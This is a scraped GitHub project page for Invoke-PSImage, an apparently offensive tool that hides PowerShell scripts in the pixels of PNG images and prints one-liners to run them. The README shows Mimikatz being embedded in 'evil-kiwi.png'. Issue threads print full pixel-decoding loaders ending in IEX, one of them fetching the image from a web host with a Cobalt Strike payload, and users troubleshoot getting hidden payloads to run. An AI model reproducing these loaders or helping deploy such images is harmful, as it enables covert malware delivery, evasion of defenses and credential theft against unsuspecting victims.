peewpw / invoke-psimage Goto Github PK

Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to execute

License: MIT License

PowerShell 100.00%

invoke-psimage's Introduction

Invoke-PSImage

Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to execute

Invoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. It generates a oneliner for executing either from a file of from the web.

It can either create a new image using only the payload data, or it can embed the payload in the least significant bytes of an existing image so that it looks like an actual picture. The image is saved as a PNG, and can be losslessly compressed without affecting the ability to execute the payload as the data is stored in the colors themselves. When creating new images, normal PowerShell scripts are actually significantly compressed, usually producing a png with a filesize ~50% of the original script.

With the embed method, the least significant 4 bits of 2 color values in each pixel are used to hold the payload. Image quality will suffer as a result, but it still looks decent. It can accept most image types as input, but output will always be a PNG because it needs to be lossless. Each pixel of the image is used to hold one byte of script, so you will need an image with at least as many pixels as bytes in your script. This is fairly easy—for example, Invoke-Mimikatz fits into a 1920x1200 image.

Arguments

-Script [filepath] The path to the script to embed in the Image.

-Out [filepath] The file to save the resulting image to (image will be a PNG)

-Image [filepath] The image to embed the script in. (optional)

-WebRequest Output a command for reading the image from the web using Net.WebClient. You will need to host the image and insert the URL into the command.

-PictureBox Output a command for reading the image from the web using System.Windows.Forms.PictureBox. You will need to host the image and insert the URL into the command.

Example

Create an image with the script "Invoke-Mimikatz.ps1" embeded in it and output a oneliner to execute from disk:

PS>Import-Module .\Invoke-PSImage.ps1
PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg
   [Oneliner to execute from a file]

Create an image with the script "Invoke-Mimikatz.ps1" embeded in it and output a oneliner to execute from the web (you still have to host the image and edit the URL):

PS>Import-Module .\Invoke-PSImage.ps1
PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg -WebRequest
   [Oneliner to execute from the web]

Executing an image hosted on the web:

invoke-psimage's People

Contributors

Stargazers

Watchers

Forkers

dee-oh-double-gee vysecurity mshatski drclean its-a-feature syhr oxoempire michalkoczwara renatogravino choutba daynhauhangngay jymcheong hax0rg1rl boblette demonsec666 y0z4 jhare 00derp hyabcd aroundight sunnysidecruise yeyintminthuhtut deelmind johnjohnsp1 puppycodes dm2333 aln7 moriarty2016 tantantut morgothx rosdyana av1080p jerusalemsbell techlord-rce footmedia akpotter cybertroyeu dothanthitiendiettiende tmmmmmr agent-0007 snollyg0st3r weaponsandtools coffnix rich-roth lollospring the-shelter initpwn bifrozt otakosmatos codingeverysolution deadnumbers yasirow shantanu561993 wzor rishdang ellerbrock topogigiovanni summyd m00zh33 yarbojanks zloiia lidd1224856175 pythonone mrhpx phorcys5 adolfaka zenosxx aptx272 drew7 ronaldohoch minkione dviros dxflatline nahtnahs ayooshagarwal jack2 brownbelt expertasif rand0macc3ss saidortiz kazimer b1gw00d mabangde sud0h4c giubugger edgardo001 dosglas vvuwei shalomz zerocry drcege koushui sgnls samyoyo zhengfe111 axiao111 arryboom aurorafang arnow117 peibibing

invoke-psimage's Issues

$lpayload + 1?

$pscmd = "sal a New-Object;Add-Type -AssemblyName "System.Drawing";$g= a System.Drawing.Bitmap("$Out");$o= a Byte[] $array;(0..$lrows)|% {foreach($x in (0..$lwidth)){$p=$g.GetPixel($x,$_);$o[$_*$width+$x]=([math]::Floor(($p.B -band 15)*16) -bor ($p.G -band 15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..($lpayload+1)]))"

WebRequest

It seems that WebRequest parameter not working!

doesn't seem to work (no output picture)

Hello

I tried to run this on a mac but it doesn't embed the script and I don't have an output PNG.
Nota Bene: my input picture is bigger than the script I try to embed it to. (3mb for the JPG and 2.2mb for the script to embed).

here are the commands I ran:

Import-Module .\Invoke-PSImage.ps1 
Invoke-PSImage -Script ./Invoke-Mimikatz.ps1 -Out output.jpg -Image ./input.jpg

New-Object: /Users/mac/Documents/Invoke-PSImage/Invoke-PSImage.ps1:95
Line |
95 | $img = New-Object System.Drawing.Bitmap($Image)
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Exception calling ".ctor" with "1" argument(s): "The type initializer for 'Gdip' threw an exception."

So I did like that:

Import-Module .\Invoke-PSImage.ps1 
./Invoke-PSImage.ps1 -Script ./Invoke-Mimikatz.ps1 -Out output.jpg -Image ./input.jpg

But I don't obtain an output file. I tried JPG and PNG for the output file,
.\Invoke-PSImage.ps1 -Script .\Invoke-Mimikatz.ps1 -Out out.jpg -Image .\input.jpg

if it may help, I run powershell from a Mac.
Could you please assist me?

Either not working or misunderstanding instructions

So from what I understand in the instructions, you simply provide it a script that you want to execute when an image is opened, and an image, is that correct? If so, I have a file called script.ps1, which essentially just submits back the username of the user logged onto the computer back to a web page. Extremely small script -- approximately 20 lines of code.

I can run this script manually with no problem; however, when trying to embed it into the jpeg file (exported to PNG), nothing happens when opening the PNG file. Of course the PNG looks just fine --
I can see the image, etc. No error is generated either when exporting it. Here's the command that I'm entering:

Import-Module .\Invoke-PSImage.ps1
Invoke-PSImage -script .\script.ps1 -Image .\image.jpeg -Out .\result.png

Again, running the script from the PowerShell prompt, it works just fine. Taking this same working Powershell script and trying to embed it into the JPEG picture (which is 4252 x 2835) and is significantly smaller than Invoke-Mimikatz, doesn't seem to be doing anything. The JPEG goes from about 3MB to an exported PNG file of about 28.5MB

Can you let me know what I'm doing wrong, if anything? Thanks!

IEX Error in one-liner

Hello, getting a couple errors I cannot resolve. I am able to run the encoding, but my one-liner outputs the following:

PS C:\[path]> sal a New-Object;Add-Type -AssemblyName "System.Drawing";$g=a System.Drawing.Bitmap("C:\[path]\[OutputImage].PNG");$o=a Byte[] 1920;(0..0)|%{foreach($x
in(0..1919)){$p=$g.GetPixel($x,$_);$o[$_*1920+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..557]));

IEX : At line:1 char:8
+ $_Vr??e�B$Q?:Z6r?6e??h??n�? ??o5fa??
+        ~~~~~~~~~~~~~~~~~~~~
Unexpected token '�B$Q?:Z6r?6e??h??n�?' in expression or statement.
At line:6 char:19
+ BnSBo!FcD?y1Fm??t?&c?�s??p8?e?"$#6oJ?o:? K?rM?
+                   ~
The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double quotation marks ("&") to pass it as part of a string.
At line:6 char:31
+ BnSBo!FcD?y1Fm??t?&c?�s??p8?e?"$#6oJ?o:? K?rM?
+                               ~~~~~~~~~~~~~~~~
The string is missing the terminator: ".
At line:1 char:296
+ ... g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..557])); ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : UnexpectedToken,Microsoft.PowerShell.Commands.InvokeExpressionCommand

There are no ampersands in my .ps1.

I've tried a couple different images with no change.

When running "[IO.File]::ReadAllText("C:\[path]\[InputScript].ps1")" my script appears perfectly.

Appreciate any help you are able to offer.

Script won't work for me...

Hi,
I've tried everything.. changed from a german to an english System also but the one option is I get nothing: no Output in PowerShell, no new Picture, it just jumps to the next line... Then Jacoby (I'm Jacoby) told me to paste the whole script in the Powershell and I get this:
https://github.com/LDByteron/pics/blob/main/Capture.PNG
Can someone please help me?

No effect after opening image created by this script

I used this
PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-kiwi.png
evil-kiwi.png was created and had lower quality than original (as mentioned) but upon opening nothing happened.
What could be the reason?

the term 'xxxxxx' is not recognized as the name of a cmdlet

Hi,
Trying to run this via a simple script, that will just 'write-output 123', and I'm getting an error when trying to execute the one-liner:

any ideas? :)

Error: ParseException - Invoke-Expression: Ampersand not allowed

Testing with 1920*1920 pixel image and Invoke-Mimikatz.ps1 as mentioned on README.md got this error.

PS C:\Users\admin> sal a New-Object;
Add-Type -AssemblyName "System.Drawing";
$g= a System.Drawing.Bitmap("C:\Users\admin\Desktop\Invoke-PSImage\evil-sexy.png");
$o= a Byte[] 2208000;(0..1149)|% {foreach($x in (0..1919)){$p=$g.GetPixel($x,$_);$o[$_*1920+$x]=([math]::Floor(($p.B -band 15)*16) -bor ($p.G -band 15))}};
$g.Dispose();
IEX([System.Text.Encoding]::ASCII.GetString($o[0..2206859]))
Invoke-Expression : Ampersand not allowed. The & operator is reserved for future use; use "&" to pass ampersand as a string.
At line:6 char:4
+ IEX <<<< ([System.Text.Encoding]::ASCII.GetString($o[0..2206859]))
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : AmpersandNotAllowed,Microsoft.PowerShell.Commands.InvokeExpressionCommand

PS C:\Users\admin> $PSVersionTable

Name                           Value                                                                                                                                                                                                                               
----                           -----                                                                                                                                                                                                                               
CLRVersion                     2.0.50727.5420                                                                                                                                                                                                                      
BuildVersion                   6.1.7601.17514                                                                                                                                                                                                                      
PSVersion                      2.0                                                                                                                                                                                                                                 
WSManStackVersion              2.0                                                                                                                                                                                                                                 
PSCompatibleVersions           {1.0, 2.0}                                                                                                                                                                                                                          
SerializationVersion           1.1.0.1                                                                                                                                                                                                                             
PSRemotingProtocolVersion      2.1

May be the same issue as Empire's issue. Error With Ampersand Character in Stager #798.

Update: I dumped the result from [System.Text.Encoding]::ASCII.GetString($o[0..2206859]). Doesn't looks like IEX()'s argument I think.

00000000: fffe 6600 5d00 3f00 7400 3f00 5600 2000  ..f.].?.t.?.V. .
00000010: 3f00 3f00 6f00 3f00 6200 4d00 3f00 3f00  ?.?.o.?.b.M.?.?.
00000020: 6b00 1f00 5700 0d00 3f00 3000 0a00 3f00  k...W...?.0...?.
00000030: 3f00 0a00 3f00 3f00 4e00 3f00 3f00 4900  ?...?.?.N.?.?.I.
00000040: 3800 2000 0d00 3f00 7600 6900 3200 3f00  8. ...?.v.i.2.?.
00000050: 6300 2f00 3f00 7400 0500 3f00 7600 5700  c./.?.t...?.v.W.
00000060: 1600 6700 5100 3f00 4d00 3f00 3f00 6b00  ..g.Q.?.M.?.?.k.
00000070: 1300 3f00 2000 2500 6300 2000 1900 3f00  ..?. .%.c. ...?.
00000080: 2000 3f00 3f00 6f00 3f00 3f00 5200 5600   .?.?.o.?.?.R.V.
00000090: 3f00 6500 3800 2600 7600 5600 3f00 4900  ?.e.8.&.v.V.?.I.
000000a0: 3f00 3f00 6300 4400 3f00 6e00 0e00 5600  ?.?.c.D.?.n...V.
000000b0: 2000 2800 3f00 6c00 5e00 1700 6900 6500   .(.?.l.^...i.e.
000000c0: 1600 7900 0100 3f00 6100 4200 3f00 6900  ..y...?.a.B.?.i.
000000d0: 3f00 4600 6100 4000 3200 6300 3f00 3f00  [email protected].?.?.
000000e0: 6c00 5c00 3f00 6c00 3f00 3f00 6e00 0900  l.\.?.l.?.?.n...
000000f0: 2600 6d00 3f00 3f00 2e00 0500 5600 6900  &.m.?.?.....V.i.

windows10

Sorry! My mistake.

Nothing happen anything

when i open the .png file is nothing happen anything :(

psimage build not working

good day sir. when i build a sample file that pop up calculator. sample ps1 file. i followed your steps as explained in the readme. it build the output png successfully. but when i run it , it doesn't trigger anything

One liner doesn't generate

I've got the conversion portion working, but when the second file is generated, there is no one-line string generated off of the IEX([System.Text.Encoding]::ASCII.GetString variable.

Eror

eror. https://imgur.com/O8tYNTS

Can't seem to get it to work

I embeded "shutdown -s -t 0" into a .jpeg and output into .png
But when i open the .png nothing executes

Not Working Any help would be alsome!!

Hello I seem to be getting This error: "Invoke-PSImage : Index was outside the bounds of the array.
At line:1 char:1

Invoke-PSImage -Script .\Test.ps1 -Image .\ps_kiwi.png -Out .\Test-kiwi.png

  + CategoryInfo          : OperationStopped: (:) [Invoke-PSImage], IndexOutOfRangeException
  + FullyQualifiedErrorId : System.IndexOutOfRangeException,Invoke-PSImage"

When ever I try to run this test : Invoke-PSImage -Script .\Test.ps1 -Image .\ps_kiwi.png -Out Test-kiwi.png

any help would be golden Thanx

Parameter is not valid error

After trying to execute the command, that was generated by the script, i get the:
Exception calling "GetPixel" with "2" argument(s): "Parameter is not valid." At line:1 char:180 sal a New-Object;Add-Type -AssemblyName "System.Drawing";$g= a System.Drawing.Bitmap("($pwd).path\evil-78.png");$o= a Byte[] 1920;(0..0)|% {foreach($x in (0..1919)){$p=$g.GetPixel <<<< ($x,$_);$o[$_*1920+$x]=([math]::Floor(($p.B -band 1 5)*16) -bor ($p.G -band 15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..8])); + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : DotNetMethodException

The command is:

sal a New-Object;Add-Type -AssemblyName "System.Drawing";$g= a System.Drawing.Bitmap(("$pwd).path\evil-78.png");$o= a Byte[] 1920;(0..0)|% {foreach($x in (0..1919)){$p=$g.GetPixel($x,$_);$o[$_*1920+$x]=([math]::Floor(($p.B -band 15)*16) -bor ($p.G -band 15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..8]))

The payload is
Write-Output 123

Cannot build PNG on Powershell for Kali

Apparently, This tool cannot be used on Powershell installed on Kali Linux even with dotnet installed.

Here's the log:-

PS /root/Invoke-PSImage> Invoke-PSImage -Image ./Small-mario.png -Script ./file.ps1 -O Evil.png 
Invoke-PSImage : Unable to find type [System.Web.Security.Membership].
At line:1 char:1
+ Invoke-PSImage -Image ./Small-mario.png -Script ./file.ps1 -O Evil.pn ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (System.Web.Security.Membership:TypeName) [Invoke-PSImage], RuntimeException
+ FullyQualifiedErrorId : TypeNotFound,Invoke-PSImage

After some searching I found out that System.Web.Security.Membership is part of System.Web assembly.

Tried to Add-Type it, same issue..

Then figured out that that Assembly relies on SII, .NET Framework, while on Kali only .NET Core is available, not Framework.

I Submitted this issue just to bring this matter to your knowledge.

error ”&“

chinese
payload.ps1 from cs
evil.png on the web server(192.168.211.1)

PS C:\Users\root\Desktop\Invoke-PSImage-master> Import-Module .\Invoke-PSImage.ps1

PS C:\Users\root\Desktop\Invoke-PSImage-master> Invoke-PSImage -Script .\payload.ps1 -Out .\evil.png -Image .\1.png -Web
sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://example.com/evil.png"));$o=a Byte[] 3780;(0..14)|%{foreach($x in(0..251)){$p=$g.GetPixel($x,$);$o[$*252+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3538]))

PS C:\Users\root\Desktop\Invoke-PSImage-master> sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).O
penRead("http://192.168.211.1/evil.png"));$o=a Byte[] 3780;(0..14)|%{foreach($x in(0..251)){$p=$g.GetPixel($x,$);$o[$*252+$x]=([math]::F
loor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3538]))
IEX : 所在位置行:1 字符: 162

... ?s�?(??pE?a?u:??r(FtK?a?"GU$s=?b??s??ve+"O/VcM' C2G??a?WsV&l?vc??-� ...

不允许使用与号(&)。& 运算符是为将来使用而保留的；请用双引号将与号引起来("&")，以将其作为字符串的一部分传递。
所在位置行:4 字符: 83

... e?Vt?&s?6t??h?R'v'M?wlR?nD?'?BI??kY�n]?,��$m?_?Vu?B)?? D?r??o?�u"R)??

表达式中缺少右“)”。
所在位置行:5 字符: 87

... t?? ??P�fm p ?%a'FeD?(iF?n�?0??a??t?7 ??T)�)?ET?&[??$n'wa?we(�

表达式中缺少右“)”。
所在位置行:8 字符: 103

... U?S?2 ��l?B,�uy7Fm?vf?ft??.;Fl??C?ge??o??:?Wa?�rIr$b?_�?a??e)?.9?I?ve ...

表达式或语句中包含意外的标记“)”。
所在位置行:8 字符: 168

... e?�t�?o?�as�',Vt??,��n�?d{ Kvr?wp^Fu?Ve*?ea?e??h??'?wo??Eu+?c?$ ...

参数列表中缺少参量。
所在位置行:9 字符: 142

... _7T!�F�DE?tEgGO?su?cd�?N?Dsz?sJgD�?q??g?UL4�O wwR?Q"?b??7)?4??Fwts ...

表达式或语句中包含意外的标记“)”。
所在位置行:9 字符: 233

... ?Jk%L;st?vg?DV?S1z?N??p??d??Qdtz.?DR�?s?%qU%b??M??g8?J?uB?&u�TM?$N? ...

不允许使用与号(&)。& 运算符是为将来使用而保留的；请用双引号将与号引起来("&")，以将其作为字符串的一部分传递。
所在位置行:9 字符: 374

... ?z&?J??J?7z ?x�?R?eN?tTD$z'DM??M��eV?z??I??r�?M?3j:?w?�JuFF�&A??0>% ...

不允许使用与号(&)。& 运算符是为将来使用而保留的；请用双引号将与号引起来("&")，以将其作为字符串的一部分传递。
所在位置行:12 字符: 292

... LWo�?rb�e7?a+&a?s:4wy?Ga!VoJ? �?$i?%?fTr N?r?Fd[?e?'h? $m?&?mX? ?ws ...

不允许使用与号(&)。& 运算符是为将来使用而保留的；请用双引号将与号引起来("&")，以将其作为字符串的一部分传递。
所在位置行:12 字符: 302

... ?a+&a?s:4wy?Ga!VoJ? �?$i?%?fTr N?r?Fd[?e?'h? $m?&?mX? ?wsK&./Vt?&.? ...

不允许使用与号(&)。& 运算符是为将来使用而保留的；请用双引号将与号引起来("&")，以将其作为字符串的一部分传递。
并未报告所有分析错误。请更正报告的错误并重试。
所在位置行:1 字符: 274

... band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3538])) ...
```
            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
- FullyQualifiedErrorId : AmpersandNotAllowed,Microsoft.PowerShell.Commands.InvokeExpressionCommand